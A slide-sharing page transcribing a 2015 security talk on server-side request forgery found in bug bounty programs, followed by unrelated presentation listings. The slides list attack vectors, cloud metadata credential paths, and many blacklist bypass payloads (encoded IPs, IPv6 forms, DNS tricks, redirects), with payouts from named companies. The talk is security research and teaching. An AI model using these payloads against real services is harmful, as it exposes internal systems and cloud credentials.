server side browsing considered harmful
play

Server-side browsing considered harmful 06/19/2015 Nicolas Grgoire - PowerPoint PPT Presentation

May 16, 2023 •221 likes •959 views

Agarri Offensive security Server-side browsing considered harmful 06/19/2015 Nicolas Grgoire Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grgoire Agarri Offensive security Context

  1. Agarri Offensive security Server-side browsing considered harmful 06/19/2015 Nicolas Grégoire

  2. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  3. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  4. Methodology  Identify server-side browsing  Ideally with responses echoed back  Identify protections (mostly blacklists)  Then bypass them  Try to maximize impact during exploitation  Prefer RCE or Cloud pwnage to port scan  Aka "creatively express my laziness" 06/19/2015 Nicolas Grégoire

  5. Scope  Covers only a few bug bounty programs  Facebook, Yahoo, CoinBase, PayPal, ...  Criteria  Interesting targets  Good security team  Fast reaction  Nice payouts 06/19/2015 Nicolas Grégoire

  6. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  7. Vectors  Resources for developers  API explorer (Adobe Omniture - @riyazwalikar)  Debug of IPN aka Webhooks (payment world)  Third-party data sources  Upload from URL (Dropbox, FastMail, …)  Import of RSS feeds (YQL, Yandex, …)  Third-party authentication  OAuth, SAML, … (used everywhere) 06/19/2015 Nicolas Grégoire

  8. Vectors  Core features of the target application  Google Translate can work from an URL  Prezi "Export to portable format"  Mixed-content proxies  Hopscotch (FastMail), Camo (Github)  And also "imageproxy", "pilbox", ...  Hosted code  Parse will execute your own JS code (YQL too!) 06/19/2015 Nicolas Grégoire

  9. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  10. URL handlers  file:// is an easy win  May be reached via a HTTP redirect  Java trick: file:///proc/self/cwd/../config/  Exotic handlers  gopher://, dict://, php://, jar://, tftp://, …  Look at the "SSRF Bible" if interested 06/19/2015 Nicolas Grégoire

  11. URL handlers  http:// et https:// are always available  Let's focus on these ones!  Lots of possible targets  HTTP and HTTPS applications  Compatible services like Redis  Fingerprintable services  SMTP, SSH, ... 06/19/2015 Nicolas Grégoire

  12. Destinations  Main goals  Loopback  Multicast  Secondary goals  Internal network aka LAN  Public IP space 06/19/2015 Nicolas Grégoire

  13. Loopback  Often hosts sensitive services  IP-based ACL bypassed by design  Monitoring  Custom: Yahoo "ymon"  Open Source: Consul, Monit, ...  Data repositories  Solr, Redis, memcached, ... 06/19/2015 Nicolas Grégoire

  14. Loopback  Depending on the architecture  Loopback may not be the backend  But an outbound proxy  Shared? With who? In scope?  CoinBase & Proximo 06/19/2015 Nicolas Grégoire

  15. The loopback idiosyncrasy  Symptoms  Scanning using different features  Getting different results  Probable causes  Partial proxying (YQL)  Specialized backends 06/19/2015 Nicolas Grégoire

  16. Multicast  Works for every EC2 or OpenStack VM  Meta-data server at http://169.254.169.254/  Interesting targets  Always here  /latest/meta-data/{hostname,public-ipv4,...}  User data (startup script for auto-scaling)  /latest/user-data  Temporary AWS credentials  /latest/meta-data/iam/security-credentials/ 06/19/2015 Nicolas Grégoire

  17. Internal network  Most of the time, there's a LAN  Except for some Cloud-only setups  With non hardened services  Monitoring, stats, ...  Databases, keystores, ...  But you need the addressing plan  Btw, are you sure 10/8 is in scope? 06/19/2015 Nicolas Grégoire

  18. Public IP space  Sometimes...  Public ACL != internal ACL  Private services on public IP  Not so uncommon...  noc.parse.com => 54.85.239.3  Hosting a Go debugger 06/19/2015 Nicolas Grégoire

  19. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  20. Blacklists  Only a few destinations to forbid  So implementing blacklists is easy  Or not?  Let's focus on  http://169.254.169.254/  http://127.0.0.1/ 06/19/2015 Nicolas Grégoire

  21. Blacklists – DNS  http://metadata.nicob.net/  Simple static A record  http://169.254.169.254.xip.io/  Free wildcard DNS service  http://1ynrnhl.xip.io/  Encoded as base36(int('254.169.254.169'))  http://www.owasp.org.1ynrnhl.xip.io/  If both whitelists and blacklists are used 06/19/2015 Nicolas Grégoire

  22. Blacklists – HTTP redirects  Redirect to the meta-data server  HTTP 302 to http://169.154.169.254/  Static way  http://nicob.net/redir6a  Dynamic way  http://nicob.net/redir-http-169.254.169.254:80- 06/19/2015 Nicolas Grégoire

  23. Blacklists – HTTP redirects  Redirects work IRL  Yahoo and Stripe were affected  There's more than 302  Like 307 for POST to POST  Test with a (multi-step) loop  May produce some distinctive errors  Points to a redirect URL via the UI/API  Then make dynamic changes on your side 06/19/2015 Nicolas Grégoire

  24. Blacklists – Alternate IP encoding  Most common representation  Dotted decimal  127.0.0.1, 169.254.169.254, ...  But any HTTP client supports more  Browser, proxy, library, …  http://www.pc-help.org/obscure.htm 06/19/2015 Nicolas Grégoire

  25. Blacklists – Alternate IP encoding http://425.510.425.510/ Dotted decimal with overflow http://2852039166/ Dotless decimal http://7147006462/ Dotless decimal with overflow http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal http://0xA9FEA9FE/ Dotless hexadecimal http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow http://0251.0376.0251.0376/ Dotted octal http://0251.00376.000251.0000376/ Dotted octal with padding 06/19/2015 Nicolas Grégoire

  26. Blacklists – Alternate IP encoding  And you can mix them  http://425.254.0xa9.0376/  Decimal (w/ and w/o) overflow + hex + octal  Or convert only parts of the address  http://0251.0xfe.43518/  Octal + hex + 2-byte wide dotless decimal 06/19/2015 Nicolas Grégoire

  27. Blacklists – IPv6  http://[::169.254.169.254]/  IPv4-compatible address  http://[::ffff:169.254.169.254]/  IPv4-mapped address 06/19/2015 Nicolas Grégoire

  28. Blacklists – loopback only  http://127.127.127.127/  Yes, it's a /8  http://0.0.0.0/  Works surprisingly often...  http://[::1]/ and http://[::]/  Moar IPv6 06/19/2015 Nicolas Grégoire

  29. Blacklists – DNS TOCTOU  Step 1  The backend server resolves the destination hostname  The backend server verifies the IP against a blacklist  The request is allowed to go to the outbound proxy  Step 2  The proxy resolves the destination hostname  The response now points to a private IP address  Toolbox  Dedicated sub-domain  Patched copy of DNSChef 06/19/2015 Nicolas Grégoire

  30. Agarri Offensive security Context Vectors Targets Blacklists Bugs Toolbox 06/19/2015 Nicolas Grégoire

  31. Agarri Offensive security 06/19/2015 Nicolas Grégoire

  32. Unused feature – Stripe  https://checkout.stripe.com/v3/checkout/desktop.js  Containing a (never called) Ajax function  Taking only one parameter named "image_url" $.ajax({ url: "https://checkout-api.stripe.com/color", data: { image_url: uri }, type: "GET", dataType: "json" }) 06/19/2015 Nicolas Grégoire

  33. Unused feature – Stripe  Client-side blacklist  Not a security measure  Includes 127.0.0.0/24  Server-side blacklist  Loopback, internal, multicast, ...  But HTTP redirects are honored 06/19/2015 Nicolas Grégoire

  34. Unused feature – Stripe Reward: $500 06/19/2015 Nicolas Grégoire

  35. Agarri Offensive security 06/19/2015 Nicolas Grégoire

  36. Hidden vector – Prezi  Base64-encoded zipped XML document . 06/19/2015 Nicolas Grégoire

  37. Hidden vector – Prezi Easier to manage with a custom Burp extension . 06/19/2015 Nicolas Grégoire

  38. Hidden vector – Prezi Each embedded object is referred by its URL . 06/19/2015 Nicolas Grégoire

  39. Hidden vector – Prezi  Looking for some server-side processing  Feature "Export to PDF" => no  Feature "Export to ZIP" => yes  Exploits  file:///etc/passwd ($2k)  http://169.254.169.254/ ($2k)  http://0177.0.0.1/ (IPy bypass, $500) 06/19/2015 Nicolas Grégoire

  40. Agarri Offensive security 06/19/2015 Nicolas Grégoire

  41. IPN – PayPal  IPN testing interface for developers  Existing blacklist  Bypassed with octal encoding  Exploit  https://012.0110.0150.0036/  IPN sent successfully to 10.72.104.30  Reward: $100 06/19/2015 Nicolas Grégoire

  42. Agarri Offensive security 06/19/2015 Nicolas Grégoire

  43. IPN – John Doe I  Webhooks testing interface for developers  No restriction on the destination  Exploit  http://127.0.0.1:8500/v1/agent/self  First fix bypassed  Using http://0.0.0.0:61315/  Reward: $750 06/19/2015 Nicolas Grégoire

  44. Agarri Offensive security 06/19/2015 Nicolas Grégoire

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R.

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R.

Cloning Considered Harmful Considered Harmful Cory Kapser and Michael W. Godfrey David R. Cheriton School of Computer Science University of Waterloo Waterloo, Ontario, Canada A Commonly Cited Belief Cloning considered harmful

881 views • 30 slides
Server Login Considered Chef Harmful Puppet Poor Hamm... You? by Kenny Louie Willem van den

Server Login Considered Chef Harmful Puppet Poor Hamm... You? by Kenny Louie Willem van den

Stephan Eggermont, Willem van den Ende Server Login Considered Chef Harmful Puppet Poor Hamm... You? by Kenny Louie Willem van den Ende @mostalive blog: me.andering.com www.qwan.it willem@qwan.it Stephan Eggermont @StonSoftware

1.09k views • 52 slides
QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui

QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui

LAC2018 @ c-base Berlin LAC2018 @ c-base Berlin QjackCtl Considered Harmful QjackCtl Considered Harmful rncbc a.k.a. a.k.a. Rui Nuno Capela Rui Nuno Capela rncbc rncbc.org rncbc.org June 2018 June 2018 (1) 2003-2004 Dawn of Qstuff* Dawn of

131 views • 11 slides
Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen

Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen

Ad Hoc Synchroniza/on Considered Harmful Weiwei Xiong, Soyoen Park, Jiaqi Zhang, Yuanyuan Zhou and Zhiqiang Ma UC San Diego University of

530 views • 39 slides
DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS

DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS

DNS Resolvers Considered Harmful Kyle Schomp, Mark Allman, and Michael Rabinovich 2 DNS resolvers abstract complexity and offer the possibility of improved performance and better scalability . Why are they harmful? 3 Resolvers Are Vulnerable

618 views • 34 slides
In-Flight IPv6 Extension Header Insertion Considered Harmful

In-Flight IPv6 Extension Header Insertion Considered Harmful

In-Flight IPv6 Extension Header Insertion Considered Harmful draft-smith-6man-in-flight-eh-insertion-harmful IETF-106 Mark Smith markzzzsmith@gmail.com Naveen Kottapalli naveen.sarma@gmail.com Ron Bonica rbonica@juniper.net Fernando Gont

506 views • 34 slides
Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In

Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In

Semantically Far Inspirations Considered Harmful? Accounting For Cognitive States In Collaborative Ideation Joel Chan 1 , Pao Siangliulue 2 , Denisa Qori McDonald 3 , Ruixue Liu 3 , Reza Moradinezhad 3 , Safa Aman 3 , Erin T. Solovey 3 ,

468 views • 44 slides
MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm

MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm

MD5 To Be Considered Harmful (Someday) Dan Kaminsky Basics MD5: Hashing algorithm Fingerprint of data easy to synthesize (push here), hard to fake (grow this) Known since 1997 it was theoretically not so hard to create

573 views • 35 slides
Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev

Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev

CHESE @ PLATEAU @ SPLASH 2017 Can Some Programming Languages Be Considered Harmful? S.Janssens U.P.Schultz V.Zaytsev Meet the ones responsible: Edsger W. Dijkstra Sabine Janssens Ulrik Pagh Schultz Vadim Zaytsev Computing pioneer

301 views • 12 slides
Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Server Side Scripting Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a server script provides a way to extend an html page to include logic and insertion of data Understand the

612 views • 12 slides
An Introduction to Php for Web API Principle of server side script WEB Client WEB SERVER html

An Introduction to Php for Web API Principle of server side script WEB Client WEB SERVER html

An Introduction to Php for Web API Principle of server side script WEB Client WEB SERVER html document SCRIPT HTTP SCRIPT Script engine Pages are generated by a program A html document at the server side includes the code to be

741 views • 72 slides
Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am..

Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am..

Penetra'on Tes'ng Considered Harmful (haroon@thinkst.com) Who i am.. (& Why this talk?) haroon@thinkst.com Some Tools Some Papers Some Books So ? Some

1.38k views • 137 slides
DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined

DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined

DYNAMIC LINKING CONSIDERED HARMFUL 1 WHY WE NEED LINKING Want to access code/data defined somewhere else (another file in our project, a library, etc) In compiler-speak, we want symbols with external linkage I only really care

563 views • 39 slides
Stack Overflow Considered Harmful? The Impact of Copy&Paste on Android Application Security

Stack Overflow Considered Harmful? The Impact of Copy&Paste on Android Application Security

Stack Overflow Considered Harmful? The Impact of Copy&Paste on Android Application Security F. Fischer * , K. Bttinger * , H.Xiao * , C. Stransky , Y. Acar , M. Backes , S. Fahl * Fraunhofer AISEC CISPA, Saarland

739 views • 44 slides
SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 ,

SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 ,

SFS: Random Write Considered Harmful in Solid State Drives Changwoo Min 1, 2 , Kangnyeon Kim 1 , Hyunjin Cho 2 , Sang-Won Lee 1 , Young Ik Eom 1 1 Sungkyunkwan University, Korea 2 Samsung Electronics, Korea Outline Background Design

367 views • 34 slides
Semaphores considered Edsger s perspective harmful During system conception it transpired

Semaphores considered Edsger s perspective harmful During system conception it transpired

Semaphores considered Edsger s perspective harmful During system conception it transpired that we used the semaphores in Semaphores are low-level primitives. Small two completely different ways. The difference is so marked that,

328 views • 19 slides
The Control Basis: An Action Architecture for Computational Development Laboratory for

The Control Basis: An Action Architecture for Computational Development Laboratory for

The Control Basis: An Action Architecture for Computational Development Laboratory for Perceptual Robotics College of Information and Computer Sciences 2 The Control Basis In place of a relatively small set of special purpose

334 views • 12 slides
Accelerating Optimization via Adaptive Prediction Mehryar Mohri 1 Scott Yang 2 1 Google, New York

Accelerating Optimization via Adaptive Prediction Mehryar Mohri 1 Scott Yang 2 1 Google, New York

Accelerating Optimization via Adaptive Prediction Mehryar Mohri 1 Scott Yang 2 1 Google, New York University 2 New York University NIPS Easy Data II, Dec 10, 2015 Scott Yang Accelerating Optimization Learning Scenario and Set-Up Online Convex

695 views • 8 slides
Privacy, AllJoyn, IoT: Why proximal networks are better JAMES KANE Co-Founder, Two Bulls 24

Privacy, AllJoyn, IoT: Why proximal networks are better JAMES KANE Co-Founder, Two Bulls 24

Privacy, AllJoyn, IoT: Why proximal networks are better JAMES KANE Co-Founder, Two Bulls 24 September 2014 AllSeen Alliance 1 Privacy concerns the information that we allow people to access and how they are allowed to use it. Security

481 views • 37 slides
COMMUNICATIVE LANGUAGE TEACHING TO SUPPORT PROJECT-BASED LANGUAGE LEARNING IN HERITAGE LANGUAGES

COMMUNICATIVE LANGUAGE TEACHING TO SUPPORT PROJECT-BASED LANGUAGE LEARNING IN HERITAGE LANGUAGES

COMMUNICATIVE LANGUAGE TEACHING TO SUPPORT PROJECT-BASED LANGUAGE LEARNING IN HERITAGE LANGUAGES Anke al-Bataineh, PhD DEMO OF This is a snippet of a course I have created COMMUNICATIVE called Lifejacket, which prepares LANGUAGE

407 views • 13 slides
12. Filas W. Celes e J. L. Rangel Outra estrutura de dados bastante usada em computao a

12. Filas W. Celes e J. L. Rangel Outra estrutura de dados bastante usada em computao a

12. Filas W. Celes e J. L. Rangel Outra estrutura de dados bastante usada em computao a fila . Na estrutura de fila, os acessos aos elementos tambm seguem uma regra. O que diferencia a fila da pilha a ordem de sada dos elementos:

396 views • 10 slides
da UNESCO Uma leitura portuguesa www.mpatraoneves.pt www.mpatraoneves.pt www.mpatraoneves.pt

da UNESCO Uma leitura portuguesa www.mpatraoneves.pt www.mpatraoneves.pt www.mpatraoneves.pt

www.mpatraoneves.pt www.mpatraoneves.pt A Declarao Universal de Biotica www.mpatraoneves.pt www.mpatraoneves.pt da UNESCO Uma leitura portuguesa www.mpatraoneves.pt www.mpatraoneves.pt www.mpatraoneves.pt www.mpatraoneves.pt Por: M.

346 views • 24 slides
LAWDO VOICE OF 05 PAZ NA INGLS 24/04/2020 NATELL VERBS ESCOLA CLASSIFIQUE AS SENTENAS

LAWDO VOICE OF 05 PAZ NA INGLS 24/04/2020 NATELL VERBS ESCOLA CLASSIFIQUE AS SENTENAS

LAWDO VOICE OF 05 PAZ NA INGLS 24/04/2020 NATELL VERBS ESCOLA CLASSIFIQUE AS SENTENAS DE ACORDO COM O TENSE A) He read those magazines last night. B) I read a book. C) They will read as much as they can this year. D) She is reading

616 views • 39 slides
Redes Redes no aleatrias Quem que te arranjou emprego ? Entrevistas a dezenas de

Redes Redes no aleatrias Quem que te arranjou emprego ? Entrevistas a dezenas de

Redes Redes no aleatrias Quem que te arranjou emprego ? Entrevistas a dezenas de pessoas de todas as classes sociais (1969) - Foi um amigo prximo ? - No, foi apenas um conhecido Os conhecimentos superficiais

448 views • 14 slides

More recommend